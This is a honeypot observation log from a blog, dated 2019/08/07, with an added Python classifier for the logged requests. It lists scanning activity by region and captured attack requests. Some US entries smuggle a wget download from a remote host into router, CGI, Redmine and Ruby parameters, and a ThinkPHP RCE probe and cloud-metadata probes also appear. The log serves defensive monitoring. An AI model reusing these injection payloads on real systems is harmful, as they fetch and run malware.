コンニチハレバレトシタアオゾラ

Idle as I am, all day long I face my blog and jot down, without rhyme or reason, the trifling thoughts that pass through my mind...

2019/08/07 Honeypot (tentative) Observation Record

This is the Honeypot (tentative) observation record for 2019/08/07.

Summary
Region:AP

The following were observed:
Access targeting a ThinkPHP vulnerability
Access targeting a Jira vulnerability (CVE-2019-11581)
Scanning activity against phpMyAdmin
Scanning activity by Jorgee
Scanning activity by ZmEu
Malicious traffic involving 112[.]124[.]42[.]80
Traffic with the User-Agent "AWS Security Scanner" was also observed.

Region:US

The following were observed:
Access targeting an Asus RT56U router vulnerability (CVE-2013-5948)
Access targeting a Jira vulnerability (CVE-2019-11581)
Access targeting a Redmine SCM Repository vulnerability
Access targeting a Spree Commerce (open-source e-commerce software) vulnerability
Access targeting a ZeroShell/Linux vulnerability (CVE-2009-0545)
Scanning activity against phpMyAdmin
Scanning activity by ZmEu
Malicious traffic involving 112[.]124[.]42[.]80
Malicious traffic involving 123[.]125[.]114[.]144

Region:EU

The following were observed:
Access targeting a Jira vulnerability (CVE-2019-11581)
Scanning activity against phpMyAdmin
Scanning activity by ZmEu
Malicious traffic involving 3[.]9[.]135[.]182
Malicious traffic involving 112[.]124[.]42[.]80
Traffic with the User-Agent "AWS Security Scanner" was also observed.

Scanning of AWS environments may be in progress.
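As an added example that is not part of the original post, the Python snippet below parses request lines in this report's "count method request protocol" layout and tags each line with the categories the summary uses (instance-metadata probes, phpMyAdmin scanning, ThinkPHP and Jira probes, ZmEu's w00tw00t request, TLS handshakes arriving on the plain-HTTP port). The sample lines, category names and regular expressions are constructed here for illustration and mirror paths that appear in the lists below.

```python
import re
from collections import Counter

# Constructed sample lines (not the post's data) in the report's
# "count method request protocol" layout, defanged the way the post defangs them.
SAMPLE_REQUESTS = [
    "10 GET /latest/dynamic/instance-identity/document HTTP/1.1",
    "1 GET http://[::ffff[:]a9fe[:]a9fe]/ HTTP/1.1",
    "8 GET /pma/scripts/setup.php HTTP/1.1",
    "1 GET /TP/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array HTTP/1.1",
    "3 GET /secure/ContactAdministrators!default.jspa HTTP/1.1",
    "8 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1",
    "6 \\x16\\x03\\x01",
    "3 GET /robots.txt HTTP/1.1",
]

# One rule per category the summary reports; the first matching rule wins.
REQUEST_RULES = [
    ("imds_probe", re.compile(r"169\.254\.169\.254|a9fe:a9fe|/latest/dynamic/instance-identity")),
    ("phpmyadmin_scan", re.compile(r"phpmyadmin|/pma/|/myadmin/|scripts/setup\.php", re.I)),
    ("thinkphp_rce_probe", re.compile(r"invokefunction|\?s=captcha", re.I)),
    ("jira_cve_2019_11581", re.compile(r"ContactAdministrators!default\.jspa")),
    ("zmeu_w00tw00t", re.compile(r"w00tw00t\.at\.blackhats")),
    ("tls_on_plain_http", re.compile(r"^\\x16\\x03\\x01")),  # TLS ClientHello record header
]

def refang(text):
    """Undo the post's [.] / [:] defanging so the rules also match live log lines."""
    return text.replace("[.]", ".").replace("[:]", ":")

def parse_line(line):
    """Split a report line into (count, request); request keeps method and protocol."""
    count, _, request = line.strip().partition(" ")
    return int(count), refang(request)

def tag_request(request):
    for label, pattern in REQUEST_RULES:
        if pattern.search(request):
            return label
    return "unclassified"

def summarize(lines):
    """Total request counts per category, for comparison with the post's summary."""
    totals = Counter()
    for line in lines:
        count, request = parse_line(line)
        totals[tag_request(request)] += count
    return dict(totals)

if __name__ == "__main__":
    for label, total in sorted(summarize(SAMPLE_REQUESTS).items(), key=lambda kv: -kv[1]):
        print(f"{total:4d}  {label}")
```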

Access count trend

AP: total accesses: 143 (change from previous day: +18)
US: total accesses: 28 (change from previous day: +8)
EU: total accesses: 40 (change from previous day: -3)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.

Region:AP

Source IP address list

Count Source IP address Country
4 113.125.44.65 China
2 114.115.181.47 China
1 123.57.242.94 China
2 128.14.133.58 United States
1 157.55.39.37 United States
1 165.22.28.110 United States
1 169.197.108.6 Netherlands
10 175.182.75.161 Taiwan
2 182.16.103.93 Hong Kong
6 195.154.86.34 France
1 198.108.67.112 United States
9 198.177.123.196 United States
5 2.224.132.78 Italy
1 39.106.227.80 China
2 45.252.248.236 Vietnam
2 5.188.210.101 Russia
20 52.25.147.204 United States
1 52.35.37.229 United States
3 54.255.201.28 Singapore
38 60.12.172.21 China
3 60.191.52.254 China
1 64.121.155.96 United States
9 69.255.234.170 United States
4 71.6.146.185 United States
9 80.195.148.174 United Kingdom
4 82.221.105.6 Iceland
1 89.248.174.52 Netherlands

User-Agent list

Count User-Agent
14 -
15 AWS Security Scanner
1 Go-http-client/1.1
1 Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
4 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
33 Mozilla/5.0 Jorgee
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
1 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
2 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 python-requests/2.10.0
1 python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2
42 ZmEu

Request list

Count Method Request Protocol
3 GET /db/ HTTP/1.1
2 GET /echo.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
2 GET HTTP/1.1
1 GET http://169[.]254[.]169[.]254/ HTTP/1.1
1 GET http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
1 GET http://example.com/ HTTP/1.1
1 GET http://[::ffff[:]a9fe[:]a9fe]/ HTTP/1.1
1 GET http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
10 GET /latest/dynamic/instance-identity/document HTTP/1.1
4 GET /manager/html HTTP/1.1
6 GET /myadmin/scripts/setup.php HTTP/1.1
6 GET /MyAdmin/scripts/setup.php HTTP/1.1
3 GET /mysql/admin/index.php?lang=en HTTP/1.1
3 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
3 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
3 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /ncsi.txt HTTP/1.1
6 GET /phpmyadmin/ HTTP/1.1
3 GET /phpmyadmin/index.php?lang=en HTTP/1.1
8 GET /phpmyadmin/scripts/setup.php HTTP/1.1
6 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
3 GET /pma/ HTTP/1.1
3 GET /PMA/ HTTP/1.1
8 GET /pma/scripts/setup.php HTTP/1.1
3 GET /robots.txt HTTP/1.1
3 GET /secure/ContactAdministrators!default.jspa HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
3 GET /TP/public/index.php HTTP/1.1
8 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET /.well-known/security.txt HTTP/1.1
3 HEAD /dbadmin/ HTTP/1.1
3 HEAD /db/ HTTP/1.1
3 HEAD / HTTP/1.1
1 HEAD http://112[.]124[.]42[.]80:63435/ HTTP/1.1
1 HEAD /images/ HTTP/1.1
6 HEAD /phpmyadmin/ HTTP/1.1
3 HEAD /pma/ HTTP/1.1
3 HEAD /PMA/ HTTP/1.1
1 POST /TP/index.php?s=captcha HTTP/1.1
6 \x16\x03\x01

Region:US

Source IP address list

Count Source IP address Country
1 111.224.249.151 China
1 123.145.17.95 China
1 123.158.48.119 China
1 124.235.138.168 China
1 124.235.138.41 China
1 124.235.138.62 China
1 169.197.108.38 Netherlands
1 182.200.7.114 China
3 195.154.86.34 France
1 198.108.67.112 United States
1 213.128.88.99 Turkey
1 218.58.38.222 China
1 27.224.137.60 China
2 46.105.234.11 France
2 47.95.224.246 China
1 52.35.37.229 United States
2 5.39.37.10 France
1 54.255.201.28 Singapore
1 54.39.209.227 Canada
1 58.248.202.31 China
1 60.191.52.254 China
1 60.208.165.146 China
1 89.248.174.52 Netherlands

User-Agent list

Count User-Agent
7 -
1 Mozilla/5.0
1 Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36
3 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
3 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2
3 ZmEu

Request list

Count Method Request Protocol
1 CONNECT cn[.]bing[.]com:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192[.]168[.]1[.]1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185[.]164[.]72[.]155/richard;
1 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185[.]164[.]72[.]155/richard;
1 GET http://boxun.com/ HTTP/1.1
1 GET http://www[.]123cha[.]com/ HTTP/1.1
1 GET http://www[.]epochtimes[.]com/ HTTP/1.1
1 GET http://www[.]ip[.]cn/ HTTP/1.1
1 GET http://www[.]minghui[.]org/ HTTP/1.1
1 GET http://www[.]rfa[.]org/english/ HTTP/1.1
1 GET http://www[.]wujieliulan[.]com/ HTTP/1.1
3 GET /manager/html HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /repository/annotate?rev=wget http://185[.]164[.]72[.]155/richard;
1 GET /?search[send]=eval&search[send][]=Kernel.fork%20do%60wget http://185[.]164[.]72[.]155/richard;
1 GET /secure/ContactAdministrators!default.jspa HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /webdav/ HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD http://112[.]124[.]42[.]80:63435/ HTTP/1.1
1 HEAD http://123[.]125[.]114[.]144/ HTTP/1.1
1 POST /cgi-bin/;wget http://185[.]164[.]72[.]155/richard;
1 PROPFIND / HTTP/1.1
1 \x16\x03\x01

Region:EU

Source IP address list

Count Source IP address Country
1 128.14.133.58 United States
3 195.154.86.34 France
1 213.128.88.99 Turkey
17 52.25.147.204 United States
1 54.255.201.28 Singapore
1 60.191.52.254 China
16 79.11.97.105 Italy

User-Agent list

Count User-Agent
10 -
7 AWS Security Scanner
2 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
3 ZmEu

Request list

Count Method Request Protocol
5 CONNECT 3[.]9[.]135[.]182:80 HTTP/1.0
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET http://169[.]254[.]169[.]254/ HTTP/1.1
1 GET http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document HTTP/1.1
1 GET http://example.com/ HTTP/1.1
1 GET http://[::ffff[:]a9fe[:]a9fe]/ HTTP/1.1
1 GET http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document HTTP/1.1
2 GET /latest/dynamic/instance-identity/document HTTP/1.1
2 GET /manager/html HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /secure/ContactAdministrators!default.jspa HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 HEAD http://112[.]124[.]42[.]80:63435/ HTTP/1.1
5 \x16\x03\x01